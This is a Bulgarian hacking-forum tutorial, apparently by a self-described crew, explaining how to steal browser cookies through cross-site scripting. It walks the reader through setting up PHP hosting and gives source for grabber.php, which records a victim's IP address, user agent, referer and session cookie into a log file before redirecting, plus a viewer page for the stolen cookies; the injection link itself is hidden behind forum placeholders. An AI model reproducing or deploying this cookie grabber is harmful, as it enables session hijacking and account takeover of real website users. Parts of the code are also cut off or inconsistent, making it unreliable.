Как се взимат cookies чрез XSS?!

Здравейте отново! В преден урок бях убяснил какво е XSS:

Cross-site
scripting (XSS) е вид уязвимост в компютърната сигурност която се
намира в уеб приложенията. Тя позволява на атакуващия сървара да
използва зловреден код. Този код може да се ползва за много неща като
примерно взимане на сесий или bypass на контролирана страница (priv8).

За придобиване на достъп в сайт който има допусната уязвимост XSS ще Ви е нужно да имате 2 неща:
1. Сайт който е уязвим към XSS!
2. Поддържащ php хостинг [You must be registered and logged in to see this image.]

Сега се регистрирайте в някой хостинг! След като влезнете в File Manager-a направете един php файл с име по Ваша преценка! [You must be registered and logged in to see this image.]
cookie.php
Код:

COOKIES STEALTHER

by Scr!pt3r XSSecurity Crew

 

Cookie Stealer



COOKIES STEALTHER

by Scr!pt3r XSSecurity Crew





Този файл cookie.php се използва за да виждаме откраднатите cookies.

Сега създаваме още един php файл който ще краде самите cookies:
grabber.php

Код: [You must be registered and logged in to see this link.]$ip = $_SERVER['REMOTE_ADDR'];
$refferer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET[c];
$time = date("Y-m-d G:i:s A");
$text
= "

".$time." = ".$ip."

User
Agent: ".$agent."
Referer: ".$referer."
Session:
".$data."


";
$file = fopen('log.php' , 'a');
fwrite($file,$text);
fclose($file);
header("Location: [You must be registered and logged in to see this link.]
?>

Този код ще взима информация за жертвата!

След пренасочването към [You must be registered and logged in to see this link.] ще се запишат cookies за този сайт!

Много известен съм станал! пиши ми в скайп script3r_xssecurity